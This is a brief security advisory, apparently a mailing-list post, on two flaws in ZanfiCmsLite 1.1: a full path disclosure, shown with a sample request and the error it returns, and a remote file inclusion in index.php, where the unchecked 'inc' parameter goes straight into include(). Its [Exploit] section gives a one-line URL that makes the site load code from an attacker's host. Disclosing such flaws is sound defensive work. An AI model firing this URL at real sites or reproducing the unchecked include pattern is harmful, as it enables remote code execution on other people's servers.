<<< Date Index >>>     <<< Thread Index >>>

Multiple vulnerabilities in ZanfiCmsLite




********************************** 
*AuThor:Cracklove                * 
*emA!l:Cracklove[at]Gmail[dot]Com* 
*HoMePaGe:http://ProxySky.com    * 
********************************** 

[Info] 

Website: http://www.zanfi.nl 
Version: 1.1,The Newest Version 
Problem: Full path disclosure,Include file 

[Vuls] 

1.Full path disclosure: 

Let's try to request like this: 

http://localhost/cms/adm_pages.php 

and we get standard error messages like that: 

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in 
c:\appserv\www\cms\adm_pages.php on line 2 
No blocks in the table 

The Problem also in 
corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc. 


2.Include file 

Ok let's open ./index.php,We see 

if (!isset($inc)): 
    include ("home.php"); 
else: 
    include ($inc.".php"); 
endif; 

O Yeah!See u Again Include Vul! 

[Exploit] 

http://target/index.php?inc=http://[Attacker] 

[Fix] 

Vuls has been reported to autuor,No reply yet. 

[Greetings] 

Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm. 

http://www.proxysky.com/vulz/show.php?id=3